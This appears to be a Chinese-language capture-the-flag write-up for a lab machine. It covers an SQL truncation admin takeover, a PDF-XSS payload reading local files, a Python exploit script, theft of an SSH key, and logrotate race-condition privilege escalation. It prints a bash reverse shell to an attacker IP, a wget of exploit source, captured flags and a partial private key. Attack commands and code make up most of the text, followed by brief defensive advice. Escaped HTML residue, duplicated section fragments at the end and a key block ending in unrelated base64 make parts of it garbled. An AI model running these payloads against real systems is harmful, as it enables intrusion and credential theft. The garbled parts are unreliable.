SQL截断攻击与权限提升技术详解<\/h1>

1. 信息收集阶段<\/h2>

1.1 基础扫描<\/h3>

使用nmap进行端口扫描：<\/p>

nmap -p- 10.10.10.176 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp: OpenSSH 7.6p1 Ubuntu<\/li>
80\/tcp: Apache httpd 2.4.29 (Ubuntu)<\/li>
<\/ul>
1.2 Web目录扫描<\/h3>
使用feroxbuster进行目录扫描：<\/p>
feroxbuster --url http:\/\/10.10.10.176
<\/span><\/span><\/code><\/pre>发现重要路径：http:\/\/10.10.10.176\/admin<\/code><\/p>
2. SQL截断攻击(SQL Truncation Attack)<\/h2>
2.1 攻击原理<\/h3>
SQL截断攻击利用数据库字段长度限制，通过输入特定长度的数据导致数据库截断输入，从而绕过身份验证或获得管理员权限。<\/p>
2.2 攻击步骤<\/h3>

发现注册时admin@book.htb已存在<\/li>
尝试在邮箱后添加空格和点：
name=<\/span>admin%40book.htb&email=<\/span>admin%40book.htb++++++.&password=<\/span>123456<\/span>
<\/span><\/span><\/code><\/pre><\/li>
确定数据库最大字符串长度为20，当"."位于第21位时被删除<\/li>
成功以管理员身份登录http:\/\/10.10.10.176\/admin<\/code><\/li>
<\/ol>
3. PDF-XSS文件读取漏洞<\/h2>
3.1 漏洞发现<\/h3>
在collection.php<\/code>中发现PDF上传功能，测试XSS注入点：<\/p>
<p<\/span> id<\/span>=<\/span>"test"<\/span>>vu<\/p<\/span>><script<\/span>>document.getElementById<\/span>('test'<\/span>).innerHTML<\/span>+=<\/span>'ln'<\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>3.2 文件读取利用<\/h3>
构造XSS payload读取文件：<\/p>
<script<\/span>>
<\/span><\/span>x<\/span>=<\/span>new<\/span> XMLHttpRequest<\/span>;
<\/span><\/span>x<\/span>.onload<\/span>=<\/span>function<\/span>(){document.write<\/span>(this<\/span>.responseText<\/span>)};
<\/span><\/span>x<\/span>.open<\/span>("GET"<\/span>,"file:\/\/\/etc\/passwd"<\/span>);
<\/span><\/span>x<\/span>.send<\/span>();
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>3.3 自动化利用脚本<\/h3>
#!\/usr\/bin\/python3<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>from<\/span> cmd import<\/span> Cmd
<\/span><\/span>from<\/span> tika import<\/span> parser
<\/span><\/span>
<\/span><\/span>class<\/span> Terminal<\/span>(Cmd):
<\/span><\/span>    # 初始化会话等代码...<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> default<\/span>(self, args):
<\/span><\/span>        files =<\/span> {'Upload'<\/span>: ('file.pdf'<\/span>, 'dummy data'<\/span>, 'application\/pdf'<\/span>)}
<\/span><\/span>        values =<\/span> {
<\/span><\/span>            'title'<\/span>: '<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:\/\/'<\/span> +<\/span> args +<\/span> '");x.send();<\/script>'<\/span>,
<\/span><\/span>            'author'<\/span>: '0xdf'<\/span>,
<\/span><\/span>            'Upload'<\/span>: 'Upload'<\/span>
<\/span><\/span>        }
<\/span><\/span>        # 上传PDF并获取结果...<\/span>
<\/span><\/span><\/code><\/pre>4. 权限提升技术<\/h2>
4.1 获取SSH私钥<\/h3>
通过文件读取获取\/home\/reader\/.ssh\/id_rsa<\/code>：<\/p>
$ python3 exp.py book> \/home\/reader\/.ssh\/id_rsa
<\/span><\/span><\/code><\/pre>4.2 TRP00F自动化权限提升<\/h3>
使用TRP00F工具：<\/p>
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10000<\/span> --rhost 10.10.16.24 --rport 10001<\/span> --http 1111<\/span>
<\/span><\/span><\/code><\/pre>4.3 logrotate条件竞争漏洞<\/h3>
4.3.1 漏洞发现<\/h4>
通过pspy32发现root每5秒执行\/root\/log.sh<\/code>和logrotate<\/code><\/p>
4.3.2 漏洞利用<\/h4>

准备payload：<\/li>
<\/ol>
echo -e '#!\/bin\/bash\nbash -c "\/bin\/bash -i >& \/dev\/tcp\/10.10.16.24\/10033 0>&1" &'<\/span>>shell.sh
<\/span><\/span>chmod +x shell.sh
<\/span><\/span><\/code><\/pre>
编译利用工具：<\/li>
<\/ol>
wget http:\/\/10.10.16.24\/logrotten.c
<\/span><\/span>gcc -o logrotten logrotten.c
<\/span><\/span>chmod +x logrotten
<\/span><\/span><\/code><\/pre>
执行攻击：<\/li>
<\/ol>
echo test >> \/home\/reader\/backups\/access.log;sleep 1;.\/logrotten -d -p shell.sh \/home\/reader\/backups\/access.log
<\/span><\/span><\/code><\/pre>4.3.3 漏洞原理<\/h4>
logrotate存在竞争条件，攻击者可以在logrotate重命名日志文件后，将日志目录替换为指向其他位置的符号链接，导致root在任意目录创建文件。<\/p>
5. 关键文件内容<\/h2>
5.1 获取的用户凭据<\/h3>

User.txt: 8bdb753f4a753405e4508285c19a84c2<\/code><\/li>
Root.txt: aae4b4b5c5603ef3e0d4c4a37345851f<\/code><\/li>
<\/ul>
5.2 SSH私钥<\/h3>
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ
[...省略部分内容...]
e3N0cm9rZTojMDAwO3N0cm9rZS13aWR0aDowLjU7fQogICAgPC9zdHlsZT4KPC9z
dmc+Cg==
-----END RSA PRIVATE KEY-----
<\/code><\/pre>
6. 防御建议<\/h2>


SQL截断防御<\/strong>：<\/p>

实施输入验证和长度限制<\/li>
使用预处理语句<\/li>
对用户输入进行适当转义<\/li>
<\/ul>
<\/li>

XSS防御<\/strong>：<\/p>

实施内容安全策略(CSP)<\/li>
对用户输入进行HTML编码<\/li>
禁用PDF中的JavaScript执行<\/li>
<\/ul>
<\/li>

权限提升防御<\/strong>：<\/p>

确保日志目录权限正确设置<\/li>
使用su选项配置logrotate<\/li>
定期更新系统和软件包<\/li>
<\/ul>
<\/li>
<\/ol>

SQL截断攻击与权限提升技术详解<\/h1>

1. 信息收集阶段<\/h2>

2.1 攻击原理<\/h3> SQL截断攻击利用数据库字段长度限制，通过输入特定长度的数据导致数据库截断输入，从而绕过身份验证或获得管理员权限。<\/p>

3. PDF-XSS文件读取漏洞<\/h2>

4. 权限提升技术<\/h2>

4.3 logrotate条件竞争漏洞<\/h3>

4.3.1 漏洞发现<\/h4> 通过pspy32发现root每5秒执行\/root\/log.sh<\/code>和logrotate<\/code><\/p>

4.3.3 漏洞原理<\/h4> logrotate存在竞争条件，攻击者可以在logrotate重命名日志文件后，将日志目录替换为指向其他位置的符号链接，导致root在任意目录创建文件。<\/p>

5. 关键文件内容<\/h2>

2.1 攻击原理<\/h3>
SQL截断攻击利用数据库字段长度限制，通过输入特定长度的数据导致数据库截断输入，从而绕过身份验证或获得管理员权限。<\/p>

4.3.1 漏洞发现<\/h4>
通过pspy32发现root每5秒执行`\/root\/log.sh<\/code>和logrotate<\/code><\/p>`

4.3.3 漏洞原理<\/h4>
logrotate存在竞争条件，攻击者可以在logrotate重命名日志文件后，将日志目录替换为指向其他位置的符号链接，导致root在任意目录创建文件。<\/p>